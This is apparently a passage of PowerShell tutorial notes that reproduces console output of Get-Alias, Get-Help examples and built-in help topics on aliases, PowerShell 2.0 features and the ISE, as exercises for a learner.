Definition ----------- ---- ---------- Alias % ForEach-Object Alias ? Where-Object Alias ac Add-Content Alias asnp Add-PSSnapIn Alias cat Get-Content Alias cd Set-Location Alias chdir Set-Location Alias clc Clear-Content Alias clear Clear-Host Alias clhy Clear-History Alias cli Clear-Item Alias clp Clear-ItemProperty Alias cls Clear-Host Alias clv Clear-Variable Alias compare Compare-Object Alias copy Copy-Item Alias cp Copy-Item Alias cpi Copy-Item Alias cpp Copy-ItemProperty Alias cvpa Convert-Path Alias dbp Disable-PSBreakpoint Alias del Remove-Item Alias diff Compare-Object Alias dir Get-ChildItem Alias ebp Enable-PSBreakpoint Alias echo Write-Output Alias epal Export-Alias Alias epcsv Export-Csv Alias epsn Export-PSSession Alias erase Remove-Item Alias etsn Enter-PSSession Alias exsn Exit-PSSession Alias fc Format-Custom Alias fl Format-List Alias foreach ForEach-Object Alias ft Format-Table Alias fw Format-Wide Alias gal Get-Alias Alias gbp Get-PSBreakpoint Alias gc Get-Content Alias gci Get-ChildItem Alias gcm Get-Command Alias gcs Get-PSCallStack Alias gdr Get-PSDrive Alias ghy Get-History Alias gi Get-Item Alias gjb Get-Job Alias gl Get-Location Alias gm Get-Member Alias gmo Get-Module Alias gp Get-ItemProperty Alias gps Get-Process Alias group Group-Object Alias gsn Get-PSSession Alias gsnp Get-PSSnapIn Alias gsv Get-Service Alias gu Get-Unique Alias gv Get-Variable Alias gwmi Get-WmiObject Alias h Get-History Alias history Get-History Alias icm Invoke-Command Alias iex Invoke-Expression Alias ihy Invoke-History Alias ii Invoke-Item Alias ipal Import-Alias Alias ipcsv Import-Csv Alias ipmo Import-Module Alias ipsn Import-PSSession Alias ise powershell_ise.exe Alias iwmi Invoke-WMIMethod Alias kill Stop-Process Alias lp Out-Printer Alias ls Get-ChildItem Alias man help Alias md mkdir Alias measure Measure-Object Alias mi Move-Item Alias mount New-PSDrive Alias move Move-Item Alias mp Move-ItemProperty Alias mv Move-Item Alias nal New-Alias Alias ndr New-PSDrive Alias ni New-Item Alias nmo New-Module Alias nsn New-PSSession Alias nv New-Variable Alias ogv Out-GridView Alias oh Out-Host Alias popd Pop-Location Alias ps Get-Process Alias pushd Push-Location Alias pwd Get-Location Alias r Invoke-History Alias rbp Remove-PSBreakpoint Alias rcjb Receive-Job Alias rd Remove-Item Alias rdr Remove-PSDrive Alias ren Rename-Item Alias ri Remove-Item Alias rjb Remove-Job Alias rm Remove-Item Alias rmdir Remove-Item Alias rmo Remove-Module Alias rni Rename-Item Alias rnp Rename-ItemProperty Alias rp Remove-ItemProperty Alias rsn Remove-PSSession Alias rsnp Remove-PSSnapin Alias rv Remove-Variable Alias rvpa Resolve-Path Alias rwmi Remove-WMIObject Alias sajb Start-Job Alias sal Set-Alias Alias saps Start-Process Alias sasv Start-Service Alias sbp Set-PSBreakpoint Alias sc Set-Content Alias select Select-Object Alias set Set-Variable Alias si Set-Item Alias sl Set-Location Alias sleep Start-Sleep Alias sort Sort-Object Alias sp Set-ItemProperty Alias spjb Stop-Job Alias spps Stop-Process Alias spsv Stop-Service Alias start Start-Process Alias sv Set-Variable Alias swmi Set-WMIInstance Alias tee Tee-Object Alias type Get-Content Alias where Where-Object Alias wjb Wait-Job Alias write Write-Output PS C:\> ``` - Examples of ```Get-Help``` ```Powershell PS C:\> Get-Help Get-Help -Examples NAME Get-Help SYNOPSIS Displays information about Windows PowerShell commands and concepts. -------------------------- EXAMPLE 1 -------------------------- C:\PS>get-help Description ----------- This command displays help about the Windows PowerShell help system. -------------------------- EXAMPLE 2 -------------------------- C:\PS>get-help * Description ----------- This command displays a list of all help files in the Windows PowerShell help system. -------------------------- EXAMPLE 3 -------------------------- C:\PS>get-help get-alias C:\PS>help get-alias C:\PS>get-alias -? Description ----------- These commands display basic information about the get-alias cmdlet. The "Get-Help" and "-?" commands display the i nformation on a single page. The "Help" command displays the information one page at a time. -------------------------- EXAMPLE 4 -------------------------- C:\PS>get-help about_* Description ----------- This command displays a list of the conceptual topics included in Windows PowerShell help. All of these topics begi n with the characters "about_". To display a particular help file, type "get-help , for example, "get-h elp about_signing". -------------------------- EXAMPLE 5 -------------------------- C:\PS>get-help ls -detailed Description ----------- This command displays detailed help for the Get-ChildItem cmdlet by specifying one of its aliases, "ls." The Detail ed parameter requests the detailed view of the help file, which includes parameter descriptions and examples. To se e the complete help file for a cmdlet, use the Full parameter. -------------------------- EXAMPLE 6 -------------------------- C:\PS>get-help format-string -full Description ----------- This command displays the full view help for the Format-String cmdlet. The full view of help includes parameter des criptions, examples, and a table of technical details about the parameters. -------------------------- EXAMPLE 7 -------------------------- C:\PS>get-help start-service -examples Description ----------- This command displays examples of using start-service in Windows PowerShell commands. -------------------------- EXAMPLE 8 -------------------------- C:\PS>get-help get-childitem -parameter f* Description ----------- This command displays descriptions of the parameters of the Get-ChildItem cmdlet that begin with "f" (filter and fo rce). For descriptions of all parameters, type "get-help get-childitem parameter*". -------------------------- EXAMPLE 9 -------------------------- C:\PS>(get-help write-output).syntax Description ----------- This command displays only the syntax of the Write-Output cmdlet. Syntax is one of many properties of help objects; others are description, details, examples, and parameters. To fin d all properties and methods of help objects, type "get-help | get-member"; for example, "get-help st art-service | get member". -------------------------- EXAMPLE 10 -------------------------- C:\PS>(get-help trace-command).alertset Description ----------- This command displays the notes about the cmdlet. The notes are stored in the alertSet property of the help object. The notes include conceptual information and tips for using the cmdlet. By default, the notes are displayed only wh en you use the Full parameter of Get-Help, but you can also display them by using the alertSet property. -------------------------- EXAMPLE 11 -------------------------- C:\PS>get-help add-member -full | out-string -stream | select-string -pattern clixml Description ----------- This example shows how to search for a word in particular cmdlet help topic. This command searches for the word "cl ixml" in the full version of the help topic for the Add-Member cmdlet. Because the Get-Help cmdlet generates a MamlCommandHelpInfo object, not a string, you need to use a command that tr ansforms the help topic content into a string, such as Out-String or Out-File. -------------------------- EXAMPLE 12 -------------------------- C:\PS>get-help get-member -online Description ----------- This command displays the online version of the help topic for the Get-Member cmdlet. -------------------------- EXAMPLE 13 -------------------------- C:\PS>get-help remoting Description ----------- This command displays a list of topics that include the word "remoting" in their contents. When you enter a word that does not appear in any topic title, Get-Help displays a list of topics that include that word. -------------------------- EXAMPLE 14 -------------------------- C:\PS>get-help get-item -path SQLSERVER:\DataCollection NAME Get-Item SYNOPSIS Gets a collection of Server objects for the local computer and any computers to which you have made a SQL Serve r PowerShell connection. ... C:\PS> cd SQLSERVER:\DataCollection C:\PS> SQLSERVER:\DataCollection> get-help get-item NAME Get-Item SYNOPSIS Gets a collection of Server objects for the local computer and any computers to which you have made a SQL Serve r PowerShell connection. ... C:\PS> Get-Item NAME Get-Item SYNOPSIS Gets the item at the specified location. ... Description ----------- This example shows how to get help for the Get-Item cmdlet that explains how to use the cmdlet in the DataCollectio n node of the Windows PowerShell SQL Server provider. The example shows two ways of getting the custom help for Get-Item. The first command uses the Path parameter of Get-Help to specify the provider path. This command can be entered at any path location. The second command uses the Set-Location cmdlet (alias = "cd") to go to the provider path. From that location, even without the Path parameter, the Get-Help command gets the custom help for the provider path. The third command shows that a Get-Help command in a file system path, and without the Path parameter, gets the sta ndard help for the Get-Item cmdlet. -------------------------- EXAMPLE 15 -------------------------- C:\PS>get-help c:\ps-test\MyScript.ps1 Description ----------- This command gets help for the MyScript.ps1 script. For information about writing help for your functions and scrip ts, see about_Comment_Based_Help. PS C:\> ``` - Get all ```powershell``` help topics for ```alias``` ```Powershell PS C:\> Get-Help *alias* Name Category Synopsis ---- -------- -------- Export-Alias Cmdlet Exports information about currently defined aliases to a file. Get-Alias Cmdlet Gets the aliases for the current session. Import-Alias Cmdlet Imports an alias list from a file. New-Alias Cmdlet Creates a new alias. Set-Alias Cmdlet Creates or changes an alias (alternate name) for a cmdlet or other comma... Alias Provider Provides access to the Windows PowerShell aliases and the values that th... about_aliases HelpFile Describes how to use alternate names for cmdlets and commands in Windows PS C:\> ``` - Getting help for ```about_aliases``` ```Powershell PS C:\> Get-Help about_aliases TOPIC about_aliases SHORT DESCRIPTION Describes how to use alternate names for cmdlets and commands in Windows PowerShell. LONG DESCRIPTION An alias is an alternate name or nickname for a cmdlet or for a command element, such as a function, script, file, or executable file. You can use the alias instead of the command name in any Windows PowerShell commands. To create an alias, use the New-Alias cmdlet. For example, the following command creates the "gas" alias for the Get-AuthenticodeSignature cmdlet: new-alias -name gas -value Get-AuthenticodeSignature After you create the alias for the cmdlet name, you can use the alias instead of the cmdlet name. For example, to get the Authenticode signature for the SqlScript.ps1 file, type: get-authenticodesignature sqlscript.ps1 Or, type: gas sqlscript.ps1 If you create "word" as the alias for Microsoft Office Word, you can type "word" instead of the following: "c:\program files\microsoft office\office11\winword.exe" BUILT-IN ALIASES Windows PowerShell includes a set of built-in aliases, including "cd" and "chdir" for the Set-Location cmdlet, and "ls" and "dir" for the Get-ChildItem cmdlet. To get all the aliases on the computer, including the built-in aliases, type: get-alias ALIAS CMDLETS Windows PowerShell includes the following cmdlets, which are designed for working with aliases: - Get-Alias. Gets all the aliases in the current session. - New-Alias. Creates a new alias. - Set-Alias. Creates or changes an alias. - Export-Alias. Exports one or more aliases to a file. - Import-Alias. Imports an alias file into Windows PowerShell. For detailed information about the cmdlets, type: get-help -detailed For example, type: get-help export-alias -detailed CREATING AN ALIAS To create a new alias, use the New-Alias cmdlet. For example, to create the "gh" alias for Get-Help, type: new-alias -name gh -value get-help You can use the alias in commands, just as you would use the full cmdlet name, and you can use the alias with parameters. For example, to get detailed Help for the Get-WmiObject cmdlet, type: get-help get-wmiobject -detailed Or, type: gh get-wmiobject -detailed SAVING ALIASES The aliases that you create are saved only in the current session. To use the aliases in a different session, add the alias to your Windows PowerShell profile. Or, use the Export-Alias cmdlet to save the aliases to a file. For more information, type: get-help about_profile GETTING ALIASES To get all the aliases in the current session, including the built-in aliases, the aliases in your Windows PowerShell profiles, and the aliases that you have created in the current session, type: get-alias To get particular aliases, use the Name parameter of the Get-Alias cmdlet. For example, to get aliases that begin with "p", type: get-alias -name p* To get the aliases for a particular item, use the Definition parameter. For example, to get the aliases for the Get-ChildItem cmdlet type: get-alias -definition Get-ChildItem ALTERNATE NAMES FOR COMMANDS WITH PARAMETERS You can assign an alias to a cmdlet, script, function, or executable file. However, you cannot assign an alias to a command and its parameters. For example, you can assign an alias to the Get-EventLog cmdlet, but you cannot assign an alias to the "get-eventlog -logname system" command. However, you can create a function that includes the command. To create a function, type the word "function" followed by a name for the function. Type the command, and enclose it in braces ({}). For example, the following command creates the syslog function. This function represents the "get-eventlog -logname system" command: function syslog {get-eventlog -logname system} You can now type "syslog" instead of the command. And, you can create aliases for the syslog function. For more information about functions, type: get-help about_functions ALIAS OBJECTS Windows PowerShell aliases are represented by objects that are instances of the System.Management.Automation.AliasInfo class. For more information about this type of object, see "AliasInfo Class" in the Microsoft Developer Network (MSDN) library at http://go.microsoft.com/fwlink/?LinkId=143644. To view the properties and methods of the alias objects, get the aliases. Then, pipe them to the Get-Member cmdlet. For example: get-alias | get-member To view the values of the properties of a specific alias, such as the "dir" alias, get the alias. Then, pipe it to the Format-List cmdlet. For example, the following command gets the "dir" alias. Next, the command pipes the alias to the Format-List cmdlet. Then, the command uses the Property parameter of Format-List with a wildcard character (*) to display all the properties of the "dir" alias. The following command performs these tasks: get-alias -name dir | format-list -property * WINDOWS POWERSHELL ALIAS PROVIDER Windows PowerShell includes the Alias provider. The Alias provider lets you view the aliases in Windows PowerShell as though they were on a file system drive. The Alias provider exposes the Alias: drive. To go into the Alias: drive, type: set-location alias: To view the contents of the drive, type: get-childitem To view the contents of the drive from another Windows PowerShell drive, begin the path with the drive name. Include the colon (:). For example: get-childitem -path alias: To get information about a particular alias, type the drive name and the alias name. Or, type a name pattern. For example, to get all the aliases that begin with "p", type: get-childitem -path alias:p* For more information about the Windows PowerShell Alias provider, type: get-help alias-psprovider SEE ALSO new-alias get-alias set-alias export-alias import-alias get-psprovider get-psdrive about_functions about_profiles about_providers PS C:\> ``` ###### Exercise - Use ```Get-Help``` to retrieve help about ```Get-Command```. ```Powershell PS C:\Users\Windows-32> Get-Help Get-Command NAME Get-Command SYNOPSIS Gets basic information about cmdlets and other elements of Windows PowerShell commands. SYNTAX Get-Command [[-Name] ] [-CommandType {Alias | Function | Filter | Cmdlet | ExternalScript | Application | Script | All}] [[-ArgumentList] ] [-Module ] [-Syntax] [-TotalCount ] [ ] Get-Command [-Noun ] [-Verb ] [[-ArgumentList] ] [-Module ] [-Syntax] [-Tot alCount ] [] DESCRIPTION The Get-Command cmdlet gets basic information about cmdlets and other elements of Windows PowerShell commands in th e session, such as aliases, functions, filters, scripts, and applications. Get-Command gets its data directly from the code of a cmdlet, function, script, or alias, unlike Get-Help, which ge ts its information from help topic files. Without parameters, "Get-Command" gets all of the cmdlets and functions in the current session. "Get-Command *" get s all Windows PowerShell elements and all of the non-Windows-PowerShell files in the Path environment variable ($en v:path). It groups the files in the "Application" command type. You can use the Module parameter of Get-Command to find the commands that were added to the session by adding a Win dows PowerShell snap-in or importing a module. RELATED LINKS Online version: http://go.microsoft.com/fwlink/?LinkID=113309 about_Command_Precedence Get-Help Get-PSDrive Get-Member Import-PSSession Export-PSSession REMARKS To see the examples, type: "get-help Get-Command -examples". For more information, type: "get-help Get-Command -detailed". For technical information, type: "get-help Get-Command -full". PS C:\Users\Windows-32> ``` - Use Get-Help ```about_``` to retrieve help about ```powershell.exe```. ```Powershell PS C:\Users\Windows-32> Get-Help about* Name Category Synopsis ---- -------- -------- about_aliases HelpFile Describes how to use alternate names for cmdlets and commands in Windows about_Arithmetic_Operators HelpFile Describes the operators that perform arithmetic in Windows PowerShell. about_arrays HelpFile Describes a compact data structure for storing data elements. about_Assignment_Operators HelpFile Describes how to use operators to assign values to variables. about_Automatic_Variables HelpFile Describes variables that store state information for Windows PowerShell. about_Break HelpFile Describes a statement you can use to immediately exit Foreach, For, While, about_command_precedence HelpFile Describes how Windows PowerShell determines which command to run. about_Command_Syntax HelpFile Describes the notation used for Windows PowerShell syntax in Help. about_Comment_Based_Help HelpFile Describes how to write comment-based Help topics for functions and scripts. about_CommonParameters HelpFile Describes the parameters that can be used with any cmdlet. about_Comparison_Operators HelpFile Describes the operators that compare values in Windows PowerShell. about_Continue HelpFile Describes how the Continue statement immediately returns the program flow about_Core_Commands HelpFile Lists the cmdlets that are designed for use with Windows PowerShell about_data_sections HelpFile Explains Data sections, which isolate text strings and other read-only about_debuggers HelpFile Describes the Windows PowerShell debugger. about_do HelpFile Runs a statement list one or more times, subject to a While or Until about_environment_variables HelpFile Describes how to access Windows environment variables in Windows about_escape_characters HelpFile Introduces the escape character in Windows PowerShell and explains about_eventlogs HelpFile Windows PowerShell creates a Windows event log that is about_execution_policies HelpFile Describes the Windows PowerShell execution policies and explains about_For HelpFile Describes a language command you can use to run statements based on a about_Foreach HelpFile Describes a language command you can use to traverse all the items in a about_format.ps1xml HelpFile The Format.ps1xml files in Windows PowerShell define the default display about_functions HelpFile Describes how to create and use functions in Windows PowerShell. about_functions_advanced HelpFile Introduces advanced functions that act similar to cmdlets. about_functions_advanced_methods HelpFile Describes how functions that specify the CmdletBinding attribute can use about_functions_advanced_param... HelpFile Explains how to add static and dynamic parameters to functions that declare about_functions_cmdletbindinga... HelpFile Describes an attribute that declares a function that acts similar to a about_hash_tables HelpFile Describes how to create, use, and sort hash tables in Windows PowerShell. about_History HelpFile Describes how to retrieve and run commands in the command history. about_If HelpFile Describes a language command you can use to run statement lists based about_jobs HelpFile Provides information about how Windows PowerShell background jobs run a about_job_details HelpFile Provides details about background jobs on local and remote computers. about_join HelpFile Describes how the join operator (-join) combines multiple strings into a about_Language_Keywords HelpFile Describes the keywords in the Windows PowerShell scripting language. about_Line_Editing HelpFile Describes how to edit commands at the Windows PowerShell command prompt. about_locations HelpFile Describes how to access items from the working location in Windows about_logical_operators HelpFile Describes the operators that connect statements in Windows PowerShell. about_methods HelpFile Describes how to use methods to perform actions on objects in Windows about_modules HelpFile Explains how to install, import, and use Windows PowerShell modules. about_objects HelpFile Provides essential information about objects in Windows PowerShell. about_operators HelpFile Describes the operators that are supported by Windows PowerShell. about_parameters HelpFile Describes how to work with cmdlet parameters in Windows PowerShell. about_Parsing HelpFile Describes how Windows PowerShell parses commands. about_Path_Syntax HelpFile Describes the full and relative path name formats in Windows PowerShell. about_pipelines HelpFile Combining commands into pipelines in the Windows PowerShell about_preference_variables HelpFile Variables that customize the behavior of Windows PowerShell about_profiles HelpFile Describes how to create and use a Windows PowerShell profile. about_prompts HelpFile Describes the Prompt function and demonstrates how to create a custom about_properties HelpFile Describes how to use object properties in Windows PowerShell. about_providers HelpFile Describes how Windows PowerShell providers provide access to data and about_pssessions HelpFile Describes Windows PowerShell sessions (PSSessions) and explains how to about_pssession_details HelpFile Provides detailed information about Windows PowerShell sessions and the about_PSSnapins HelpFile Describes Windows PowerShell snap-ins and shows how to use and manage them. about_Quoting_Rules HelpFile Describes rules for using single and double quotation marks about_Redirection HelpFile Describes how to redirect output from Windows PowerShell to text files. about_Ref HelpFile Describes how to create and use a reference variable type. about_regular_expressions HelpFile Describes regular expressions in Windows PowerShell. about_remote HelpFile Describes how to run remote commands in Windows PowerShell. about_remote_FAQ HelpFile Contains questions and answers about running remote commands about_remote_jobs HelpFile Describes how to run background jobs on remote computers. about_remote_output HelpFile Describes how to interpret and format the output of remote commands. about_remote_requirements HelpFile Describes the system requirements and configuration requirements for about_remote_troubleshooting HelpFile Describes how to troubleshoot remote operations in Windows PowerShell. about_requires HelpFile Prevents a script from running by requiring the specified snap-ins and about_Reserved_Words HelpFile Lists the reserved words that cannot be used as identifiers because they about_Return HelpFile Exits the current scope, which can be a function, script, or script block. about_scopes HelpFile Explains the concept of scope in Windows PowerShell and shows how to set about_scripts HelpFile Describes how to write and run scripts in Windows PowerShell. about_script_blocks HelpFile Defines what a script block is and explains how to use script blocks in about_script_internationalization HelpFile Describes the script internationalization features of Windows PowerShell... about_Session_Configurations HelpFile Describes session configurations, which determine the users who can about_Signing HelpFile Explains to how sign scripts so that they comply with the Windows about_Special_Characters HelpFile Describes the special characters that you can use to control how about_split HelpFile Explains how to use the split operator to split one or more strings into about_Switch HelpFile Explains how to use a switch to handle multiple If statements. about_Throw HelpFile Describes the Throw keyword, which generates a terminating error. about_transactions HelpFile Describes how to manage transacted operations in Windows PowerShell. about_trap HelpFile Describes a keyword that handles a terminating error. about_try_catch_finally HelpFile Describes how to use the Try, Catch, and Finally blocks to handle about_types.ps1xml HelpFile Explains how the Types.ps1xml files let you extend the Microsoft .NET about_type_operators HelpFile Describes the operators that work with Microsoft .NET Framework types. about_Variables HelpFile Describes how variables store values that can be used in Windows about_While HelpFile Describes a language statement that you can use to run a command block about_wildcards HelpFile Describes how to use wildcard characters in Windows PowerShell. about_Windows_PowerShell_2.0 HelpFile Describes the new features that are included in Windows PowerShell 2.0. about_Windows_PowerShell_ISE HelpFile Describes the features and system requirements of Windows PowerShell about_WMI_Cmdlets HelpFile Provides background information about Windows Management Instrumentation about_WS-Management_Cmdlets HelpFile Provides an overview of Web Services for Management (WS-Management) as PS C:\Users\Windows-32> ``` ```Powershell PS C:\Users\Windows-32> Get-Help about_Windows_PowerShell_2.0 TOPIC about_Windows_PowerShell_2.0 SHORT DESCRIPTION Describes the new features that are included in Windows PowerShell 2.0. LONG DESCRIPTION Windows PowerShell 2.0 includes several significant features that extend its use, improve its usability, and allow you to control and manage Windows-based environments more easily and comprehensively. Windows PowerShell 2.0 is backward compatible. Cmdlets, providers, snap-ins, scripts, functions, and profiles that were designed for Windows PowerShell 1.0 work in Windows PowerShell 2.0 without changes. NEW FEATURES Windows PowerShell 2.0 includes the following new features. Remoting Windows PowerShell 2.0 lets you run commands on one or many remote computers with a single Windows PowerShell command. You can run individual commands, or you can create a persistent connection (a session) to run a series of related commands. You can also start a session with a remote computer so that the commands you type run directly on the remote computer. The remoting features of Windows PowerShell are built on Windows Remote Management (WinRM). WinRM is the Microsoft implementation of the WS-Management protocol, a standard SOAP-based, firewall-compatible communications protocol. The remote computers must have Windows PowerShell 2.0, the Microsoft .NET Framework 2.0, and the WinRM service. Remote commands are supported on all operating systems that can run Windows PowerShell. The current user must have permission to run commands on the remote computers. For more information, see about_Remote_Requirements. To support remoting, the Invoke-Command, Enter-PSSession, and Exit-PSSession cmdlets have been added, along with other cmdlets that contain the PSSession noun. These cmdlets let you create and manage persistent connections. The ComputerName parameter has also been added to several cmdlets, including the Get-Process, Get-Service, and Get-Eventlog cmdlets. This parameter allows you to get information about remote computers. These cmdlets use .NET Framework methods to get their data, so they do not rely on Windows PowerShell remoting. They do not require any new programs or configuration. For more information, see the Help for each cmdlet. For more information about remote commands, see about_Remote and about_Remote_FAQ. For more information about sessions, see about_PSSessions. Windows PowerShell ISE Windows PowerShell 2.0 includes Windows PowerShell Integrated Scripting Environment (ISE), a host application that lets you run commands, and design, write, test, and debug scripts in a graphical, color-coded, Unicode-based environment. Windows PowerShell ISE requires the Microsoft .NET Framework 3.0 or later. Windows PowerShell ISE includes: - A Command pane that lets you run interactive commands just as you would in the Windows PowerShell console. Just type a command, and then press ENTER. The output appears in the Output pane. - A Script pane that lets you compose, edit, debug, and run functions and scripts. - Multiple tabs, each with its own Command and Script pane, that let you work on one or several tasks independently. Windows PowerShell ISE is designed for both novice and advanced users. Background Jobs Background jobs are commands that run asynchronously. When you run a background job, the command prompt returns immediately, even if the command is still running. You can use the background job feature to run a complex command in the background so that you can use your session for other work while the command runs. You can run a background job on a local or remote computer and then save the results on the local or remote computer. To run a job remotely, use the Invoke-Command cmdlet. Windows PowerShell includes a set of cmdlets that contain the Job noun (the Job cmdlets). Use these cmdlets for creating, starting, managing, and deleting background jobs and for getting the results of a background job. To get a list of the job cmdlets, type the following command: get-command *-job For more information about background jobs, see about_Jobs. Script Debugger Windows PowerShell 2.0 includes a cmdlet-based debugger for scripts and functions. The debugger is supported by a fully documented public API that you can use to build your own debugger or to customize or extend the debugger. The debugger cmdlets let you set breakpoints on lines, columns, variables, and commands. These cmdlets let you manage the breakpoints and display the call stack. You can create conditional breakpoints and specify custom actions at a breakpoint, such as running diagnostic and logging scripts. When you reach a breakpoint, Windows PowerShell suspends execution and starts the debugger. The debugger includes a set of custom commands that let you step through the code. You can also run standard Windows PowerShell commands to display the values of variables, and you can use cmdlets to investigate the results. For more information about debugging, see about_Debuggers. Data Section Scripts designed for Windows PowerShell 2.0 can have one or more DATA sections that isolate the data from the script logic. The data in the new DATA section is restricted to a specified subset of the Windows PowerShell scripting language. In Windows PowerShell 2.0, the DATA section is used to support script internationalization. You can use the DATA section to isolate and identify user message strings that will be translated into multiple user interface languages. For more information, see about_Data_Sections. Script Internationalization Windows PowerShell 2.0 script internationalization features allow you to better serve users throughout the world. Script internationalization enables scripts and functions to display messages and Help text to users in multiple languages. The script internationalization features query the operating system user interface culture ($PsUICulture) during execution and then import the appropriate translated text strings so you can display them to the user. The Data section lets you store text strings separate from code so that they are easily identified. A new cmdlet, ConvertFrom-StringData, converts text strings into dictionary-like hash tables to facilitate translation. For more information, see about_Script_Internationalization. WMI Cmdlets The Windows Management Instrumentation (WMI) functionality of Windows PowerShell 2.0 is improved with the addition of the following cmdlets: - Remove-WmiObject - Set-WmiInstance - Invoke-WmiMethod New parameters have been added to the Get-WmiObject cmdlet. All the WMI cmdlets now support the following parameters: - EnableAllPrivileges - Impersonation - Authentication - Authority These new parameters give you more refined control over the security configuration of your WMI operations without requiring you to work directly with the types in the .NET Framework Class Library. For a list of WMI cmdlets, type the following command: get-help *wmi* To get help for each cmdlet, type get-help followed by the cmdlet name. The Get-WinEvent Cmdlet The Get-WinEvent cmdlet gets events from Event Viewer logs and from Event Tracing for Windows (ETW) event log files on local and remote computers. It can get events from classic event logs and from the Windows Event Logs that were introduced in Windows Vista. You can use Get-WinEvent to get the objects that represent event logs, event log providers, and the events in the logs. Get-WinEvent lets you combine events from different sources in a single command. It supports advanced queries in XML Path Language (XPath), XML, and hash table format. Get-WinEvent requires Windows Vista or Windows Server 2008 and the Microsoft .NET Framework 3.5. The Out-Gridview Cmdlet The Out-GridView cmdlet displays the results of other commands in an interactive table in which you can search, sort, group, and filter the results. For example, you can send the results of a Get-Process, Get-WmiObject, Get-WinEvent, or Get-Eventlog command to Out-GridView and then use the table features to examine the data. help out-gridview -full The Add-Type Cmdlet The Add-Type cmdlet lets you add .NET Framework types to Windows PowerShell from the source code of another .NET Framework language. Add-Type compiles the source code that creates the types and generates assemblies that contain the new .NET Framework types. Then, you can use the .NET Framework types in Windows PowerShell commands along with the standard object types provided by the .NET Framework. You can also use Add-Type to load assemblies into your session so that you can use the types in the assemblies in Windows PowerShell. Add-Type allows you develop new .NET Framework types, to use .NET Framework types in C# libraries, and to access Win32 APIs. For more information, see Add-Type. Event Notification Windows PowerShell 2.0 introduces event notification. Users can register and subscribe to events, such as Windows PowerShell events, WMI events, or .NET Framework events. And, users can listen, forward, and act on management and system events both synchronously and asynchronously. Developers can write applications that use the event architecture to receive notification about state changes. Users can write scripts that subscribe to various events and that react to the content. Windows PowerShell provides cmdlets that create new events, get events and event subscriptions, register and unregister events, wait for events, and delete events. For more information about these cmdlets, type the following command: get-command *-event Modules Windows PowerShell modules let you divide and organize your Windows PowerShell scripts into independent, self-contained, reusable units. Code from a module executes in its own context, so it does not add to, conflict with, or overwrite the variables, functions, aliases, and other resources in the session. You can write, distribute, combine, share, and reuse modules to build simple scripts and complex applications. Windows PowerShell 2.0 includes cmdlets to add, get, and remove modules and to export module members. For more information about the cmdlets that are related to modules, type the following command: get-command *-module* Transactions Windows PowerShell 2.0 includes support for transactions. Transactions let you undo an entire series of operations. Transactions are available only for operations that support transactions. They are designed for applications that require atomicity, consistency, isolation, and recoverability, like databases and message queuing. Cmdlets and providers that support transactions have a new UseTransaction parameter. To start an operation within a transaction, use the Start-Transaction cmdlet. Then, when you use the cmdlets that perform the operation, use the UseTransaction parameter of each cmdlet when you want the command to be part of a transaction. If any command in the transaction fails at any point, use the Rollback-Transaction cmdlet to undo all the commands in the transaction. If all the commands succeed, use the Commit-Transaction cmdlet to make the command actions permanent. Windows PowerShell 2.0 includes cmdlets to start, use, commit, and roll back transactions. For information about these cmdlets, type the following command: get-command *transaction* Breaking Changes to Windows PowerShell 1.0 -- The value of the PowerShellVersion registry entry in HKLM\SOFTWARE\Microsoft\PowerShell\1\PowerShellEngine is changed to 2.0. -- New cmdlets and variables have been added. These additions might conflict with variables and functions in profiles and scripts. -- The -IEQ operator performs a case insensitive comparison on characters. -- The Get-Command cmdlet gets functions by default, in addition to cmdlets. -- Native commands that generate a user interface cannot be piped to the Out-Host cmdlet. -- The new Begin, Process, End, and Dynamic Param language keywords might conflict with similar words used in scripts and functions. Interpreting these words as language keywords might result in parsing errors. -- Cmdlet name resolution has changed. In Windows PowerShell 1.0, a runtime error was generated when two Windows PowerShell snap-ins exported cmdlets with the same name. In Windows PowerShell 2.0, the last cmdlet that is added to the session runs when you type the command name. To run a command that does not run by default, qualify the cmdlet name with the name of the snap-in or module in which it originated. -- A function name followed by '-?' gets the help topic for the function, if one is included in the function. -- Parameter resolution for Microsoft .Net Frameword methods have changed. In Windows PowerShell 1.0, if you called an overloaded .NET method that has more than one best fit syntax, no error was reported. In Windows PowerShell 2.0, an ambiguity error is reported. In addition, in Windows PowerShell 2.0, the algorithm for choosing the best fit method has been revised significantly to minimize the number of ambiguities. -- If you are enumerating a collection in the pipeline and you try to modify the collection in the pipeline, Windows PowerShell throws an exception. For example, the following commands would work in Windows PowerShell 1.0, but would fail after first pipeline iteration in Windows PowerShel 2.0. $h = @{Name="Hello"; Value="Test"} $h.keys | foreach-object {$h.remove($_)} To avoid this error, create a sub-expression for the enumerator by using the $() characters. For example: $($h.keys) | foreach-object {$h.remove($_)} For more information about Windows PowerShell 2.0, visit the following Web sites: -- Windows PowerShell Web Site http://go.microsoft.com/fwlink/?LinkID=106031 -- Windows PowerShell Team Blog: http://go.microsoft.com/fwlink/?LinkId=143696 SEE ALSO about_Data_Sections about_Debuggers about_Functions_Advanced about_Jobs about_Join about_PSSessions about_Remote about_Script_Internationalization about_Split PS C:\Users\Windows-32> ``` ```Powershell PS C:\Users\Windows-32> Get-Help about_Windows_PowerShell_ISE TOPIC about_Windows_PowerShell_ISE SHORT DESCRIPTION Describes the features and system requirements of Windows PowerShell Integrated Scripting Environment (ISE). LONG DESCRIPTION Windows PowerShell ISE is a host application for Windows PowerShell. In Windows PowerShell ISE, you can run commands and write, test, and debug scripts in a single Windows-based graphical user interface. Its features include multiline editing, tab completion, syntax coloring, selective execution, context-sensitive Help, and support for right-to-left languages. Notes: Because this feature requires a user interface, it does not work on Server Core installations of Windows Server. Window PowerShell ISE is built on the Windows Presentation Foundation (WPF). If the graphical elements of Windows PowerShell ISE do not render correctly on your system, you might resolve the problem by adding or adjusting the graphics rendering settings on your system. This might be required if the computer has an older video driver or you are using virtualization software. For more information, see "Graphics Rendering Registry Settings" in the MSDN library at http://go.microsoft.com/fwlink/?LinkId=144711. Running Interactive Commands You can run any Windows PowerShell expression or command in Windows PowerShell ISE. You can use cmdlets, providers, snap-ins, and modules as you would use them in the Windows PowerShell console. You can type or paste interactive commands in the Command pane. To run the commands, you can use buttons, menu items, and keyboard shortcuts. You can use the multiline editing feature to type or paste several lines of code into the Command pane at once. When you press the UP ARROW key to recall the previous command, all the lines in the command are recalled. When you type commands, press SHIFT+ENTER to make a new blank line appear under the current line. Viewing Output The results of commands and scripts are displayed in the Output pane. You can move or copy the results from the Output pane by using keyboard shortcuts or the Output toolbar, and you can paste the results in other programs. You can also clear the Output pane by clicking the Clear Output button or by typing one of the following commands: clear-host cls Writing Scripts and Functions In the Script pane, you can open, compose, edit, and run scripts. The 